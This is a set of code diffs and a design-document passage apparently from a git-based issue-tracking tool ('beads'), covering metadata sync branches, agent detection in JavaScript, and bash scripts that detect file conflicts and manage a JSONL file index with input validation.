+Use GitHub's modern **rulesets** (not legacy branch protection) which support file path restrictions:
+
+1. Create a **push ruleset** for the `main`/`master` branch
+2. Add the rule "Require a pull request before merging"
+3. In the bypass list, add a **GitHub App** (e.g., "Beads Sync Bot") or specific team
+4. The App gets a short-lived token via `actions/create-github-app-token` to push .beads/ changes
+
+**Important limitation**: GitHub rulesets' "Restrict file paths" rule **blocks** pushes to specified paths — it cannot **allow** specific paths while blocking others in the same rule. The bypass must be actor-based (specific App or team), not path-based.
+
+#### Option C: Orphan branch (git-native, no GitHub features needed)
+
+```bash
+# Create an orphan branch for beads metadata
+git checkout --orphan beads-meta
+git rm -rf .
+# Copy only .beads/ content
+cp -r .beads/ .
+git add .beads/
+git commit -m "beads: initial metadata"
+git push origin beads-meta
+```
+
+The `beads-meta` orphan branch has completely independent history from code branches. Branch protection on `main` has zero effect on it. Developers sync metadata by:
+```bash
+git fetch origin beads-meta
+git checkout origin/beads-meta -- .beads/
+```
+
+**Why Option A/C are best for our constraints**:
+- No GitHub-specific features required — works on GitLab, Bitbucket, self-hosted
+- No App registration or token management
+- Works offline — sync branch is just another git branch
+- Option C (orphan) is cleanest: complete separation of metadata and code history
+
+**Real-world examples**:
+- `gh-pages` orphan branch pattern — used by GitHub Pages for years
+- Terraform state in dedicated branches
+- GitHub's own recommendation: use rulesets + bypass lists for automation
+
+**Complexity**: Trivial (Option A: ~10 lines wrapper) / Moderate (Option C: initial setup + sync scripts ~50 lines)
+
+---
+
+## 8. Git Flow Compatibility
+
+### Problem
+Teams using git flow have `develop`, `release/*`, `hotfix/*` branches. Which branch should beads sync to? What if develop and main diverge on .beads/ state?
+
+### Recommended Solution: Single Canonical Beads Branch, Independent of Git Flow
+
+**Concrete approach**: Beads metadata syncs to ONE branch, regardless of git flow structure. This branch is configurable:
+
+```bash
+# .beads/config
+BEADS_SYNC_BRANCH="beads/sync"  # Default: dedicated branch
+# Or: "develop" for teams that want it on develop
+# Or: "main" for trunk-based teams
+```
+
+**Why a dedicated branch (not develop or main)**:
+
+| Strategy | Pros | Cons |
+|----------|------|------|
+| Sync to `develop` | Natural for git flow | Blocked during release freezes; diverges from main |
+| Sync to `main` | Single source of truth | Branch protection may block; git flow treats main as release-only |
+| Sync to `beads/sync` | Always available; no protection issues; no divergence | Extra branch to manage; developers must fetch from it |
+
+**The divergence problem and solution**:
+If beads syncs to `develop`, and `develop` is ahead of `main` (normal in git flow), then:
+- Developers on `hotfix/*` branches (branched from `main`) see stale beads state
+- Release branches may carry stale beads state
+
+Solution: The dedicated `beads/sync` branch is always the canonical source. All branches fetch beads state from it:
+
+```bash
+# In any branch, get latest beads state:
+bd_refresh() {
+  git fetch origin beads/sync --quiet
+  git checkout origin/beads/sync -- .beads/ 2>/dev/null
+  echo "Beads state refreshed from beads/sync"
+}
+```
+
+**Integration with bd sync**:
+```bash
+bd_sync() {
+  local sync_branch
+  sync_branch=$(git config --get beads.syncBranch 2>/dev/null || echo "beads/sync")
+
+  # 1. Fetch latest beads state
+  git fetch origin "$sync_branch" --quiet
+
+  # 2. Three-way merge our .beads/ with remote .beads/
+  # (uses the custom JSONL merge driver from Edge Case #1)
+  git checkout origin/"$sync_branch" -- .beads/ 2>/dev/null
+  # ... merge logic ...
+
+  # 3. Push back to sync branch
+  git push origin HEAD:.beads-temp
+  # Or use the sync branch directly if we have push access
+}
+```
+
+**Why this is best**:
+- Completely decouples issue tracking from code branching strategy
+- Works with git flow, GitHub flow, trunk-based, or any other model
+- No divergence problem — single canonical branch
+- Configurable for teams that prefer simpler setups (just set `beads.syncBranch=develop`)
+
+**Real-world examples**:
+- Fossil SCM's autosync operates independently of branching
+- `gh-pages` branch is independent of development branches
+- Terraform remote state is branch-independent
+
+**Complexity**: Trivial (config option + fetch/checkout wrapper ~30 lines)
+
+---
+
+## Summary Matrix
+
+| Edge Case | Solution | Complexity | Key Mechanism |
+|-----------|----------|------------|---------------|
+| 1. Concurrent JSONL sync | Custom git merge driver (dedup by ID) | Moderate | `.gitattributes` + merge script |
+| 2. TOCTOU conflict detection | Git push as atomic CAS + re-validate | Trivial | OCC via git's own ref atomicity |
+| 3. Orphaned claims | Timestamp-based TTL + git log activity check | Trivial | `claimed_at` + configurable TTL |
+| 4. Large team scale | File-level granularity + index partitioning | Moderate | Per-directory JSONL files |
+| 5. Cross-platform identity | `git config user.name` + OS-specific machine ID | Trivial | `$OSTYPE` switch + stable IDs |
+| 6. Network partitions | Line-level JSONL validation + recovery | Moderate | Post-merge hook + jq validation |
+| 7. Branch protection | Dedicated `beads/sync` branch or orphan branch | Trivial | Separate unprotected branch |
+| 8. Git flow compat | Single canonical beads branch, configurable | Trivial | `beads.syncBranch` git config |
+
+## Architecture Decision: Dedicated Beads Branch
+
+Edge cases 7 and 8 both converge on the same solution: **a dedicated branch for beads metadata sync**. This is the single most impactful architectural decision, as it:
+- Eliminates branch protection conflicts (#7)
+- Eliminates git flow divergence (#8)
+- Simplifies the merge driver (#1) — only beads content on this branch
+- Makes staleness detection easier (#3) — clear commit history per developer
+
+**Recommended default**: `beads/sync` branch (not an orphan — easier to set up and understand).
+
+---
+
+## Sources
+
+### Edge Case 1 — Concurrent JSONL Sync
+- [Automatic git conflict resolution on logs and sets (a3nm)](https://a3nm.net/blog/git_auto_conflicts.html)
+- [git-json-merge — xdiff-based JSON merge driver](https://github.com/jonatanpedersen/git-json-merge)
+- [A Conflict-Free Replicated JSON Datatype (arxiv)](https://arxiv.org/pdf/1608.03960)
+- [CRDT Implementations](https://crdt.tech/implementations)
+- [Linear Alternatives: Local-First Issue Tracking (Beadbox)](https://beadbox.app/en/blog/linear-alternatives-local-first-issue-tracking)
+
+### Edge Case 2 — TOCTOU
+- [Optimistic Concurrency Control (Wikipedia)](https://en.wikipedia.org/wiki/Optimistic_concurrency_control)
+- [TOCTOU Race Condition (CWE-367)](https://cwe.mitre.org/data/definitions/367.html)
+- [Optimistic Locking (eugene-eeo)](https://eugene-eeo.github.io/blog/optlock.html)
+
+### Edge Case 3 — Orphaned Claims
+- [Heartbeats in Distributed Systems (Arpit Bhayani)](https://arpitbhayani.me/blogs/heartbeats-in-distributed-systems/)
+- [HeartBeat Pattern (Martin Fowler)](https://martinfowler.com/articles/patterns-of-distributed-systems/heartbeat.html)
+- [Sessions and Distributed Locks (Consul/HashiCorp)](https://developer.hashicorp.com/consul/docs/dynamic-app-config/sessions)
+
+### Edge Case 4 — Scale
+- [Bloom Filters in System Design (GeeksforGeeks)](https://www.geeksforgeeks.org/bloom-filters-in-system-design/)
+- [Scaling Hardware Design with Git](https://www.wevolver.com/article/scaling-hardware-design-with-git-strategies-for-large-team-management)
+
+### Edge Case 5 — Cross-Platform Identity
+- [Cross-Platform Bash Snippet for Linux, WSL, Cygwin, MSYS, GitBash](https://gist.github.com/mikeslattery/5c60655478f76e26b9232aedc664eb7d)
+- [Bash OS Detection (neofetch $OSTYPE recommendation)](https://github.com/dylanaraps/neofetch/issues/433)
+- [Git's config.mak.uname platform detection](https://github.com/git/git/blob/master/config.mak.uname)
+
+### Edge Case 6 — Network Partitions
+- [JSONL Validator](https://jsonltools.com/jsonl-validator)
+- [File Integrity Verification (TechTarget)](https://www.techtarget.com/searchcontentmanagement/tip/How-to-check-and-verify-file-integrity)
+
+### Edge Case 7 — Branch Protection
+- [Available Rules for Rulesets (GitHub Docs)](https://docs.github.com/en/repositories/configuring-branches-and-merges-in-your-repository/managing-rulesets/available-rules-for-rulesets)
+- [GitHub Actions Push to Protected Branch (Ninjaneers)](https://medium.com/ninjaneers/letting-github-actions-push-to-protected-branches-a-how-to-57096876850d)
+- [GitHub Rulesets with Push Rules (GitHub Changelog)](https://github.blog/changelog/2024-09-10-push-rules-are-now-generally-available-and-updates-to-custom-properties/)
+
+### Edge Case 8 — Git Flow Compatibility
+- [Gitflow Workflow (Atlassian)](https://www.atlassian.com/git/tutorials/comparing-workflows/gitflow-workflow)
+- [Git Orphan Branches (Graphite)](https://graphite.com/guides/git-orphan-branches)
+- [Fossil SCM Autosync](https://fossil-scm.org/home/doc/tip/www/fossil-v-git.wiki)
+- [Git LFS Locking Proposal](https://github.com/git-lfs/git-lfs/blob/main/docs/proposals/locking.md)

--- a/lib/detect-agent.js
+++ b/lib/detect-agent.js
@@ -72,9 +72,10 @@ const CONFIG_SIGNATURES = [
  * Layer 4 (config file signatures) is in detectConfiguredAgents().
  *
  * @param {Record<string, string>} [env=process.env] - Environment variables
+ * @param {{ agent: string|null, editor: string|null }|null} [precomputedVSCodePaths] - Pre-computed VSCode path result to avoid duplicate calls
  * @returns {{ name: string, source: 'env'|'path', confidence: 'high'|'medium' } | null}
  */
-function detectActiveAgent(env = process.env) {
+function detectActiveAgent(env = process.env, precomputedVSCodePaths) {
   // Layer 1: AI_AGENT universal env var
   if (env.AI_AGENT) {
     return { name: env.AI_AGENT, source: 'env', confidence: 'high' };
@@ -92,8 +93,8 @@ function detectActiveAgent(env = process.env) {
     }
   }
 
-  // Layer 3: VSCode path parsing
-  const pathResult = _detectFromVSCodePaths(env);
+  // Layer 3: VSCode path parsing (reuse pre-computed result if available)
+  const pathResult = precomputedVSCodePaths !== undefined ? precomputedVSCodePaths : _detectFromVSCodePaths(env);
   if (pathResult && pathResult.agent) {
     return { name: pathResult.agent, source: 'path', confidence: 'medium' };
   }
@@ -168,11 +169,11 @@ function detectConfiguredAgents(projectRoot) {
  * }}
  */
 function detectEnvironment(projectRoot, env = process.env) {
-  const active = detectActiveAgent(env);
-  const configuredAgents = detectConfiguredAgents(projectRoot);
-
-  // Determine editor from VSCode paths
+  // Call _detectFromVSCodePaths once and share the result with detectActiveAgent's logic
   const vscodePaths = _detectFromVSCodePaths(env);
+
+  const active = detectActiveAgent(env, vscodePaths);
+  const configuredAgents = detectConfiguredAgents(projectRoot);
   const editor = vscodePaths ? vscodePaths.editor : null;
 
   return {

--- a/lib/detect-agent.js
+++ b/lib/detect-agent.js
@@ -72,10 +72,9 @@ const CONFIG_SIGNATURES = [
  * Layer 4 (config file signatures) is in detectConfiguredAgents().
  *
  * @param {Record<string, string>} [env=process.env] - Environment variables
- * @param {{ agent: string|null, editor: string|null }|null} [precomputedVSCodePaths] - Pre-computed VSCode path result to avoid duplicate calls
  * @returns {{ name: string, source: 'env'|'path', confidence: 'high'|'medium' } | null}
  */
-function detectActiveAgent(env = process.env, precomputedVSCodePaths) {
+function detectActiveAgent(env = process.env) {
   // Layer 1: AI_AGENT universal env var
   if (env.AI_AGENT) {
     return { name: env.AI_AGENT, source: 'env', confidence: 'high' };
@@ -93,8 +92,8 @@ function detectActiveAgent(env = process.env, precomputedVSCodePaths) {
     }
   }
 
-  // Layer 3: VSCode path parsing (reuse pre-computed result if available)
-  const pathResult = precomputedVSCodePaths !== undefined ? precomputedVSCodePaths : _detectFromVSCodePaths(env);
+  // Layer 3: VSCode path parsing
+  const pathResult = _detectFromVSCodePaths(env);
   if (pathResult && pathResult.agent) {
     return { name: pathResult.agent, source: 'path', confidence: 'medium' };
   }
@@ -169,11 +168,11 @@ function detectConfiguredAgents(projectRoot) {
  * }}
  */
 function detectEnvironment(projectRoot, env = process.env) {
-  // Call _detectFromVSCodePaths once and share the result with detectActiveAgent's logic
-  const vscodePaths = _detectFromVSCodePaths(env);
-
-  const active = detectActiveAgent(env, vscodePaths);
+  const active = detectActiveAgent(env);
   const configuredAgents = detectConfiguredAgents(projectRoot);
+
+  // Get editor from VSCode paths (_detectFromVSCodePaths is cheap and deterministic)
+  const vscodePaths = _detectFromVSCodePaths(env);
   const editor = vscodePaths ? vscodePaths.editor : null;
 
   return {

--- a/scripts/conflict-detect.sh
+++ b/scripts/conflict-detect.sh
@@ -117,9 +117,18 @@ _detect_conflicts() {
   local exclude_issue="$3"
   local detail="$4"
 
-  # Read all active entries from file index
+  # Read all active entries from file index, filter out stale entries (>48 hours)
   local all_entries
-  all_entries="$(file_index_read 2>/dev/null)" || all_entries="[]"
+  local now_epoch
+  now_epoch="$(date +%s)"
+  all_entries="$(file_index_read 2>/dev/null | jq -c --arg now "$now_epoch" '
+    [.[] | select(
+      if .updated_at then
+        ((.updated_at[:19] + "Z") | fromdateiso8601) as $ts |
+        (($now | tonumber) - $ts) < 172800
+      else true end
+    )]
+  ' 2>/dev/null)" || all_entries="[]"
 
   if [[ "$all_entries" == "[]" ]] || [[ -z "$all_entries" ]]; then
     echo "No conflicts found. File index is empty."

--- a/scripts/conflict-detect.sh
+++ b/scripts/conflict-detect.sh
@@ -41,7 +41,7 @@ _validate_issue_id_arg() {
 # Allows: alphanumeric, dots, hyphens, underscores, forward slashes
 _validate_file_path() {
   local path="$1"
-  if [[ ! "$path" =~ ^[a-zA-Z0-9._/\ -]+$ ]]; then
+  if [[ ! "$path" =~ ^[a-zA-Z0-9./_[:space:]-]+$ ]]; then
     echo "Error: invalid file path — contains disallowed characters: $path" >&2
     return 1
   fi
@@ -67,10 +67,14 @@ _check_stale_sync() {
     return 0
   fi
 
-  # Convert ISO 8601 timestamp to epoch seconds
+  # .last-sync stores Unix epoch seconds (written by sync-utils.sh)
   local last_epoch now_epoch
-  # Try GNU date first, then BSD date
-  last_epoch="$(date -d "$last_sync_ts" +%s 2>/dev/null || date -jf "%Y-%m-%dT%H:%M:%SZ" "$last_sync_ts" +%s 2>/dev/null || echo 0)"
+  if [[ "$last_sync_ts" =~ ^[0-9]+$ ]]; then
+    last_epoch="$last_sync_ts"
+  else
+    # Fallback: try parsing as ISO 8601 (GNU date, then BSD date)
+    last_epoch="$(date -d "$last_sync_ts" +%s 2>/dev/null || date -jf "%Y-%m-%dT%H:%M:%SZ" "$last_sync_ts" +%s 2>/dev/null || echo 0)"
+  fi
   now_epoch="$(date +%s)"
 
   local diff=$(( now_epoch - last_epoch ))

--- a/scripts/conflict-detect.sh
+++ b/scripts/conflict-detect.sh
@@ -1,0 +1,309 @@
+#!/usr/bin/env bash
+# conflict-detect.sh — Detect file/module overlaps between in-progress issues.
+#
+# Usage:
+#   conflict-detect.sh --issue <id>              Check overlaps for a given issue
+#   conflict-detect.sh --files <file1,file2,...>  Check arbitrary files against index
+#   conflict-detect.sh --issue <id> --detail      Drill down to file-level overlap
+#   conflict-detect.sh --files <f1,f2> --detail   Drill down to file-level overlap
+#
+# Exit codes:
+#   0 = no conflicts found
+#   1 = conflicts found (or validation error)
+#
+# OWASP A03: All inputs validated; shell variables quoted; jq --arg used.
+
+set -euo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+
+# Source file-index helpers (file_index_read, file_index_get)
+source "$SCRIPT_DIR/file-index.sh"
+
+# Source sync-utils (get_session_identity, sanitize_config_value)
+# Only source if available (tests may not need all utils)
+if [[ -f "$SCRIPT_DIR/sync-utils.sh" ]]; then
+  source "$SCRIPT_DIR/sync-utils.sh"
+fi
+
+# ── Input Validation ─────────────────────────────────────────────────────
+
+# Validate issue_id: alphanumeric + hyphens only
+_validate_issue_id_arg() {
+  local id="$1"
+  if [[ ! "$id" =~ ^[a-zA-Z0-9-]+$ ]]; then
+    echo "Error: invalid issue_id format: must be alphanumeric + hyphens only" >&2
+    return 1
+  fi
+}
+
+# Validate a file path: no shell injection patterns
+# Allows: alphanumeric, dots, hyphens, underscores, forward slashes
+_validate_file_path() {
+  local path="$1"
+  if [[ ! "$path" =~ ^[a-zA-Z0-9._/\ -]+$ ]]; then
+    echo "Error: invalid file path — contains disallowed characters: $path" >&2
+    return 1
+  fi
+}
+
+# ── Stale Sync Check ─────────────────────────────────────────────────────
+
+# Check if .beads/.last-sync is older than 15 minutes (900 seconds).
+# Prints a warning to stderr if stale.
+_check_stale_sync() {
+  local root="${FILE_INDEX_ROOT:-.}"
+  local last_sync_file="$root/.beads/.last-sync"
+
+  if [[ ! -f "$last_sync_file" ]]; then
+    # No sync file — skip warning (first run)
+    return 0
+  fi
+
+  local last_sync_ts
+  last_sync_ts="$(cat "$last_sync_file" 2>/dev/null | tr -d '[:space:]')"
+
+  if [[ -z "$last_sync_ts" ]]; then
+    return 0
+  fi
+
+  # Convert ISO 8601 timestamp to epoch seconds
+  local last_epoch now_epoch
+  # Try GNU date first, then BSD date
+  last_epoch="$(date -d "$last_sync_ts" +%s 2>/dev/null || date -jf "%Y-%m-%dT%H:%M:%SZ" "$last_sync_ts" +%s 2>/dev/null || echo 0)"
+  now_epoch="$(date +%s)"
+
+  local diff=$(( now_epoch - last_epoch ))
+
+  if [[ "$diff" -gt 900 ]]; then
+    echo "WARNING: File index may be stale (last sync: ${last_sync_ts}, ${diff}s ago > 900s threshold)" >&2
+  fi
+}
+
+# ── Module Extraction ────────────────────────────────────────────────────
+
+# Given a file path, derive its module directory (parent directory + /).
+# e.g., "src/lib/status.ts" -> "src/lib/"
+_derive_module() {
+  local filepath="$1"
+  local dir
+  dir="$(dirname "$filepath")"
+  # Ensure trailing slash
+  if [[ "$dir" == "." ]]; then
+    printf '%s' "./"
+  else
+    printf '%s/' "$dir"
+  fi
+}
+
+# ── Core Conflict Detection ──────────────────────────────────────────────
+
+# Check for conflicts between a set of modules/files and all entries in the index.
+# Arguments:
+#   $1 — JSON array of modules to check
+#   $2 — JSON array of files to check
+#   $3 — issue_id to exclude from comparison (empty string for --files mode)
+#   $4 — "true" or "false" for detail mode
+# Outputs conflict report to stdout.
+# Returns 0 if no conflicts, 1 if conflicts found.
+_detect_conflicts() {
+  local check_modules="$1"
+  local check_files="$2"
+  local exclude_issue="$3"
+  local detail="$4"
+
+  # Read all active entries from file index
+  local all_entries
+  all_entries="$(file_index_read)"
+
+  if [[ "$all_entries" == "[]" ]]; then
+    echo "No conflicts found. File index is empty."
+    return 0
+  fi
+
+  local conflicts_found=0
+  local output=""
+
+  # Iterate over each entry in the index
+  local entry_count
+  entry_count="$(printf '%s' "$all_entries" | jq '. | length')"
+
+  local i=0
+  while [[ "$i" -lt "$entry_count" ]]; do
+    local entry
+    entry="$(printf '%s' "$all_entries" | jq -c ".[$i]")"
+
+    local entry_issue_id
+    entry_issue_id="$(printf '%s' "$entry" | jq -r '.issue_id')"
+
+    # Skip the issue we're checking (don't conflict with yourself)
+    if [[ -n "$exclude_issue" ]] && [[ "$entry_issue_id" == "$exclude_issue" ]]; then
+      i=$((i + 1))
+      continue
+    fi
+
+    local entry_developer
+    entry_developer="$(printf '%s' "$entry" | jq -r '.developer')"
+
+    local entry_modules
+    entry_modules="$(printf '%s' "$entry" | jq -c '.modules')"
+
+    local entry_files
+    entry_files="$(printf '%s' "$entry" | jq -c '.files')"
+
+    # Check module overlap
+    local module_overlaps
+    module_overlaps="$(jq -n -c \
+      --argjson a "$check_modules" \
+      --argjson b "$entry_modules" \
+      '[$a[] as $m | $b[] | select(. == $m)] | unique')"
+
+    local module_overlap_count
+    module_overlap_count="$(printf '%s' "$module_overlaps" | jq '. | length')"
+
+    if [[ "$module_overlap_count" -gt 0 ]]; then
+      conflicts_found=1
+      local overlapping_modules_str
+      overlapping_modules_str="$(printf '%s' "$module_overlaps" | jq -r '.[]' | tr '\n' ', ' | sed 's/,$//')"
+
+      output+="CONFLICT: Issue ${entry_issue_id} (developer: ${entry_developer})"$'\n'
+      output+="  Overlapping modules: ${overlapping_modules_str}"$'\n'
+
+      # Detail mode: show file-level overlap
+      if [[ "$detail" == "true" ]]; then
+        local file_overlaps
+        file_overlaps="$(jq -n -c \
+          --argjson a "$check_files" \
+          --argjson b "$entry_files" \
+          '[$a[] as $f | $b[] | select(. == $f)] | unique')"
+
+        local file_overlap_count
+        file_overlap_count="$(printf '%s' "$file_overlaps" | jq '. | length')"
+
+        if [[ "$file_overlap_count" -gt 0 ]]; then
+          local overlapping_files_str
+          overlapping_files_str="$(printf '%s' "$file_overlaps" | jq -r '.[]' | tr '\n' ', ' | sed 's/,$//')"
+          output+="  Overlapping files: ${overlapping_files_str}"$'\n'
+        else
+          output+="  No exact file overlaps (module-level only)"$'\n'
+        fi
+      fi
+    fi
+
+    i=$((i + 1))
+  done
+
+  if [[ "$conflicts_found" -eq 1 ]]; then
+    printf '%s' "$output"
+    return 1
+  else
+    echo "No conflicts found."
+    return 0
+  fi
+}
+
+# ── Main ─────────────────────────────────────────────────────────────────
+
+main() {
+  local mode=""        # "issue" or "files"
+  local issue_id=""
+  local files_arg=""
+  local detail="false"
+
+  # Parse arguments
+  while [[ $# -gt 0 ]]; do
+    case "$1" in
+      --issue)
+        mode="issue"
+        shift
+        if [[ $# -eq 0 ]]; then
+          echo "Error: --issue requires an argument" >&2
+          exit 1
+        fi
+        issue_id="$1"
+        shift
+        ;;
+      --files)
+        mode="files"
+        shift
+        if [[ $# -eq 0 ]]; then
+          echo "Error: --files requires an argument" >&2
+          exit 1
+        fi
+        files_arg="$1"
+        shift
+        ;;
+      --detail)
+        detail="true"
+        shift
+        ;;
+      *)
+        echo "Error: unknown argument '$1'" >&2
+        echo "Usage: conflict-detect.sh --issue <id> [--detail]" >&2
+        echo "       conflict-detect.sh --files <file1,file2,...> [--detail]" >&2
+        exit 1
+        ;;
+    esac
+  done
+
+  # Require at least one mode
+  if [[ -z "$mode" ]]; then
+    echo "Usage: conflict-detect.sh --issue <id> [--detail]" >&2
+    echo "       conflict-detect.sh --files <file1,file2,...> [--detail]" >&2
+    exit 1
+  fi
+
+  # Check for stale sync
+  _check_stale_sync
+
+  if [[ "$mode" == "issue" ]]; then
+    # Validate issue_id
+    _validate_issue_id_arg "$issue_id" || exit 1
+
+    # Get the issue's entry from the file index
+    local entry
+    entry="$(file_index_get "$issue_id")"
+
+    if [[ "$entry" == "null" ]]; then
+      echo "Error: issue '$issue_id' not found in file index" >&2
+      exit 1
+    fi
+
+    local check_modules check_files
+    check_modules="$(printf '%s' "$entry" | jq -c '.modules')"
+    check_files="$(printf '%s' "$entry" | jq -c '.files')"
+
+    _detect_conflicts "$check_modules" "$check_files" "$issue_id" "$detail"
+
+  elif [[ "$mode" == "files" ]]; then
+    # Parse comma-separated file list
+    local IFS=','
+    local -a file_list
+    read -ra file_list <<< "$files_arg"
+
+    # Validate each file path
+    local -a valid_files=()
+    local -a derived_modules=()
+    for f in "${file_list[@]}"; do
+      # Trim whitespace
+      f="$(printf '%s' "$f" | sed 's/^[[:space:]]*//;s/[[:space:]]*$//')"
+      _validate_file_path "$f" || exit 1
+      valid_files+=("$f")
+
+      # Derive module from file path
+      local mod
+      mod="$(_derive_module "$f")"
+      derived_modules+=("$mod")
+    done
+
+    # Build JSON arrays using jq
+    local files_json modules_json
+    files_json="$(printf '%s\n' "${valid_files[@]}" | jq -R '.' | jq -s -c '.')"
+    # Deduplicate modules
+    modules_json="$(printf '%s\n' "${derived_modules[@]}" | jq -R '.' | jq -s -c 'unique')"
+
+    _detect_conflicts "$modules_json" "$files_json" "" "$detail"
+  fi
+}
+
+main "$@"

--- a/scripts/conflict-detect.sh
+++ b/scripts/conflict-detect.sh
@@ -9,7 +9,8 @@
 #
 # Exit codes:
 #   0 = no conflicts found
-#   1 = conflicts found (or validation error)
+#   1 = conflicts found
+#   2 = usage/validation error (malformed input)
 #
 # OWASP A03: All inputs validated; shell variables quoted; jq --arg used.
 
@@ -262,7 +263,7 @@ main() {
 
   if [[ "$mode" == "issue" ]]; then
     # Validate issue_id
-    _validate_issue_id_arg "$issue_id" || exit 1
+    _validate_issue_id_arg "$issue_id" || exit 2
 
     # Get the issue's entry from the file index
     local entry
@@ -291,7 +292,7 @@ main() {
     for f in "${file_list[@]}"; do
       # Trim whitespace
       f="$(printf '%s' "$f" | sed 's/^[[:space:]]*//;s/[[:space:]]*$//')"
-      _validate_file_path "$f" || exit 1
+      _validate_file_path "$f" || exit 2
       valid_files+=("$f")
 
       # Derive module from file path

--- a/scripts/conflict-detect.sh
+++ b/scripts/conflict-detect.sh
@@ -41,7 +41,7 @@ _validate_issue_id_arg() {
 # Allows: alphanumeric, dots, hyphens, underscores, forward slashes
 _validate_file_path() {
   local path="$1"
-  if [[ ! "$path" =~ ^[a-zA-Z0-9./_[:space:]-]+$ ]]; then
+  if [[ ! "$path" =~ ^[a-zA-Z0-9./_@[:space:]-]+$ ]]; then
     echo "Error: invalid file path — contains disallowed characters: $path" >&2
     return 1
   fi

--- a/scripts/conflict-detect.sh
+++ b/scripts/conflict-detect.sh
@@ -118,9 +118,9 @@ _detect_conflicts() {
 
   # Read all active entries from file index
   local all_entries
-  all_entries="$(file_index_read)"
+  all_entries="$(file_index_read 2>/dev/null)" || all_entries="[]"
 
-  if [[ "$all_entries" == "[]" ]]; then
+  if [[ "$all_entries" == "[]" ]] || [[ -z "$all_entries" ]]; then
     echo "No conflicts found. File index is empty."
     return 0
   fi

--- a/scripts/conflict-detect.sh
+++ b/scripts/conflict-detect.sh
@@ -269,8 +269,8 @@ main() {
     entry="$(file_index_get "$issue_id")"
 
     if [[ "$entry" == "null" ]]; then
-      echo "Error: issue '$issue_id' not found in file index" >&2
-      exit 1
+      echo "Info: issue '$issue_id' not yet in file index — no conflicts possible." >&2
+      exit 0
     fi
 
     local check_modules check_files

--- a/scripts/file-index.sh
+++ b/scripts/file-index.sh
@@ -321,7 +321,7 @@ file_index_update_from_tasks() {
     modules_json="$(printf '%s' "$sanitized_paths" | grep -v '^$' | while IFS= read -r p; do
       local d
       d="$(dirname "$p")"
-      if [[ "$d" != "." ]]; then printf '%s\n' "${d}/"; fi
+      if [[ "$d" == "." ]]; then printf '%s\n' "./"; else printf '%s\n' "${d}/"; fi
     done | jq -R . | jq -s -c 'unique')"
   else
     files_json="[]"

--- a/scripts/file-index.sh
+++ b/scripts/file-index.sh
@@ -1,0 +1,255 @@
+#!/usr/bin/env bash
+# file-index.sh — File index JSONL helpers for multi-developer awareness.
+#
+# Manages .beads/file-index.jsonl — an append-only log of which developer
+# is working on which files/modules, keyed by issue_id.
+#
+# Functions (source this file):
+#   file_index_add    <issue_id> <developer> <files_json> <modules_json>
+#   file_index_remove <issue_id>
+#   file_index_read
+#   file_index_get    <issue_id>
+#
+# Uses jq for all JSON construction (never string concatenation).
+# OWASP A03: All inputs validated and shell-injection patterns stripped.
+
+# Only set errexit/pipefail when run as a script, not when sourced
+if [[ "${BASH_SOURCE[0]}" == "${0}" ]]; then
+  set -euo pipefail
+fi
+
+# ── Helpers ──────────────────────────────────────────────────────────────
+
+# Resolve the JSONL file path.
+# FILE_INDEX_ROOT can be overridden for testing.
+_file_index_path() {
+  local root="${FILE_INDEX_ROOT:-.}"
+  printf '%s' "$root/.beads/file-index.jsonl"
+}
+
+# Sanitize a string: strip shell-injection patterns (OWASP A03)
+# Reused from dep-guard.sh pattern.
+# Removes: double quotes, $(...), backticks, semicolons, and newlines
+sanitize() {
+  local val="$1"
+  # Remove double quotes
+  val="${val//\"/}"
+  # Remove $(...) command substitution patterns (loop handles nested)
+  val="$(printf '%s' "$val" | sed -e ':loop' -e 's/\$([^()]*)//g' -e 't loop')"
+  # Remove backtick command substitution
+  val="${val//\`/}"
+  # Remove semicolons (command chaining)
+  val="${val//;/}"
+  # Replace newlines with spaces
+  val="$(printf '%s' "$val" | tr '\n' ' ')"
+  printf '%s' "$val"
+}
+
+# Validate issue_id: alphanumeric + hyphens only
+_validate_issue_id() {
+  local id="$1"
+  if [[ ! "$id" =~ ^[a-zA-Z0-9-]+$ ]]; then
+    echo "Error: invalid issue_id format: must be alphanumeric + hyphens only" >&2
+    return 1
+  fi
+}
+
+# Validate developer identity: ^[a-zA-Z0-9._@+-]+$
+_validate_developer() {
+  local dev="$1"
+  if [[ ! "$dev" =~ ^[a-zA-Z0-9._@+\-]+$ ]]; then
+    echo "Error: invalid developer format: must match ^[a-zA-Z0-9._@+-]+$" >&2
+    return 1
+  fi
+}
+
+# ── Public functions ─────────────────────────────────────────────────────
+
+# file_index_add <issue_id> <developer> <files_json> <modules_json>
+# Append an entry to the file index JSONL.
+# files_json and modules_json must be valid JSON arrays.
+file_index_add() {
+  local raw_issue_id="$1"
+  local raw_developer="$2"
+  local files_json="$3"
+  local modules_json="$4"
+
+  # Sanitize inputs
+  local issue_id
+  issue_id="$(sanitize "$raw_issue_id")"
+  # Trim whitespace produced by sanitize
+  issue_id="$(printf '%s' "$issue_id" | sed 's/^[[:space:]]*//;s/[[:space:]]*$//')"
+
+  local developer
+  developer="$(sanitize "$raw_developer")"
+  developer="$(printf '%s' "$developer" | sed 's/^[[:space:]]*//;s/[[:space:]]*$//')"
+
+  # Validate formats (after sanitization — catches injection that was stripped)
+  _validate_issue_id "$issue_id" || return 1
+  _validate_developer "$developer" || return 1
+
+  # Validate files_json and modules_json are valid JSON arrays
+  if ! printf '%s' "$files_json" | jq 'if type == "array" then empty else error end' 2>/dev/null; then
+    echo "Error: files_json must be a valid JSON array" >&2
+    return 1
+  fi
+  if ! printf '%s' "$modules_json" | jq 'if type == "array" then empty else error end' 2>/dev/null; then
+    echo "Error: modules_json must be a valid JSON array" >&2
+    return 1
+  fi
+
+  # Generate timestamp
+  local updated_at
+  updated_at="$(date -u +%Y-%m-%dT%H:%M:%SZ)"
+
+  # Build JSON using jq (never string concatenation)
+  local json_line
+  json_line="$(jq -n -c \
+    --arg id "$issue_id" \
+    --arg dev "$developer" \
+    --argjson files "$files_json" \
+    --argjson modules "$modules_json" \
+    --arg ts "$updated_at" \
+    '{
+      issue_id: $id,
+      developer: $dev,
+      files: $files,
+      modules: $modules,
+      updated_at: $ts,
+      tombstone: false
+    }')"
+
+  # Append to JSONL file
+  local jsonl_path
+  jsonl_path="$(_file_index_path)"
+
+  # Ensure parent directory exists
+  mkdir -p "$(dirname "$jsonl_path")"
+
+  printf '%s\n' "$json_line" >> "$jsonl_path"
+}
+
+# file_index_remove <issue_id>
+# Append a tombstone entry for the given issue.
+file_index_remove() {
+  local raw_issue_id="$1"
+
